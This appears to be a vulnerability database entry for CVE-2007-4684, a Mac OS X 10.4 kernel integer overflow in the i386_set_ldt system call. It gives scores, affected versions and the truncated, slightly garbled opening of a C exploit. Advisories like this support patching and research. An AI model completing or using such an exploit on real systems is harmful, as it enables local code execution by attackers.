6.9
CVSSv2

CVE-2007-4684

Published: 15/11/2007 Updated: 15/10/2018
CVSS v2 Base Score: 6.9 | Impact Score: 10 | Exploitability Score: 3.4
VMScore: 695
Vector: AV:L/AC:M/Au:N/C:C/I:C/A:C

Vulnerability Summary

Integer overflow in the kernel in Apple Mac OS X 10.4 up to and including 10.4.10 allows local users to execute arbitrary code via a large num_sels argument to the i386_set_ldt system call.

Vulnerable Product Search on Vulmon Subscribe to Product

apple mac os x 10.4.4

apple mac os x 10.4.5

apple mac os x 10.4.1

apple mac os x 10.4.10

apple mac os x 10.4.9

apple mac os x 10.4.2

apple mac os x 10.4.3

apple mac os x 10.4

apple mac os x 10.4.6

apple mac os x 10.4.7

apple mac os x 10.4.8

Exploits

#include <stdioh> #include <stdlibh> #include <architecture/i386/tableh> #include <i386/user_ldth> #include <unistdh> #include <sys/typesh> #include <sys/mmanh> int main(void) { union ldt_entry descs; char *buf; u_long pgsz = sysconf(_SC_PAGESIZE); if ((buf = (char *)malloc(pgsz * 4 ...